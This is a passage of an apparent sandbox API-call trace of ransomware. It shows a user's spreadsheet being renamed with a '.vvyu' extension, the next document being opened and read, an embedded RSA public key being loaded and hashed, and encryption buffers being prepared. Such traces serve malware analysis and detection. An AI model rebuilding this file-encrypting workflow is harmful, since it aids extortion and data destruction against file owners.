[0196.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ed0 | out: hHeap=0x620000) returned 1 [0196.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ea0 | out: hHeap=0x620000) returned 1 [0196.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0196.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0196.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0196.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e88 | out: hHeap=0x620000) returned 1 [0196.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea18d8 | out: hHeap=0x620000) returned 1 [0196.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0196.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0196.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0196.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0196.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0196.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0196.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0196.565] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x12680, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x12680, lpOverlapped=0x0) returned 1 [0196.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0196.567] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x12685, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.567] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0196.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0196.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0196.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0196.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0196.568] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0196.569] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.569] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.569] CloseHandle (hObject=0x568) returned 1 [0196.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0196.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0196.573] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0196.573] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\U-GFPMIYoqWy2p9O.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\u-gfpmiyoqwy2p9o.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\U-GFPMIYoqWy2p9O.xlsx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\u-gfpmiyoqwy2p9o.xlsx.vvyu")) returned 1 [0196.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.575] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6a53e0 | out: hHeap=0x620000) returned 1 [0196.578] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb910a00, ftCreationTime.dwHighDateTime=0x1d8971a, ftLastAccessTime.dwLowDateTime=0xf73af9e0, ftLastAccessTime.dwHighDateTime=0x1d8a60e, ftLastWriteTime.dwLowDateTime=0xf73af9e0, ftLastWriteTime.dwHighDateTime=0x1d8a60e, nFileSizeHigh=0x0, nFileSizeLow=0x1332f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YnkbYRnkC6J3AvV0Zier.odt", cAlternateFileName="YNKBYR~1.ODT")) returned 1 [0196.578] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.578] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0196.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.579] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\YnkbYRnkC6J3AvV0Zier.odt") returned=".odt" [0196.579] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\YnkbYRnkC6J3AvV0Zier.odt" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\ynkbyrnkc6j3avv0zier.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0196.579] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=78639) returned 1 [0196.579] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0196.582] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x13309, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.582] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.585] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.585] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x1332f, lpOverlapped=0x0) returned 1 [0196.586] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0196.586] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.586] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.586] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c0e0) returned 1 [0196.587] CryptCreateHash (in: hProv=0x67c0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0196.587] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.587] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0196.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0196.587] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0196.587] GetLastError () returned 0x0 [0196.588] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0196.588] CryptReleaseContext (hProv=0x67c0e0, dwFlags=0x0) returned 1 [0196.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.588] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0196.588] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0196.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.588] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0196.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x13330) returned 0x2ea79b0 [0196.589] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0196.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0196.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0196.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea18d8 [0196.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e88 [0196.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1920 [0196.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ea0 [0196.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ed0 [0196.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f30 [0196.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ee8 [0196.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0196.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0196.590] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0196.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0196.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ed0 | out: hHeap=0x620000) returned 1 [0196.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ee8 | out: hHeap=0x620000) returned 1 [0196.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f30 | out: hHeap=0x620000) returned 1 [0196.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0196.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f30 [0196.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0196.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ee8 [0196.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0196.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2ed0 [0196.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0196.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0196.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0196.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0196.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0196.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0196.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0196.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0196.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0196.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ee8 | out: hHeap=0x620000) returned 1 [0196.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ed0 | out: hHeap=0x620000) returned 1 [0196.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0196.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f30 | out: hHeap=0x620000) returned 1 [0196.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0196.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0196.594] GetCurrentThreadId () returned 0x66c [0196.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0196.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea5530 [0196.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0196.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0196.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0196.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0196.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0196.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0196.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.594] GetCurrentThreadId () returned 0x66c [0196.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0196.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0196.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0196.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccad98 [0196.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0196.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0196.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0196.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f30 [0196.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0196.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0196.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0196.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0196.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0196.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0196.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0196.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ed0 [0196.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0196.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0196.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0196.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0196.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0196.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ee8 [0196.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0196.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0196.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0196.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2eb8 [0196.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0196.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f48 [0196.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0196.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f18 [0196.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f00 [0196.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f60 [0196.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f00 | out: hHeap=0x620000) returned 1 [0196.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f00 [0196.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f18 | out: hHeap=0x620000) returned 1 [0196.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0196.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0196.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0196.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ed0 | out: hHeap=0x620000) returned 1 [0196.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ed0 [0196.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0196.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f30 | out: hHeap=0x620000) returned 1 [0196.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0196.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f60 | out: hHeap=0x620000) returned 1 [0196.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0196.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0196.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0196.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ed0 | out: hHeap=0x620000) returned 1 [0196.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0196.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0196.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0196.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 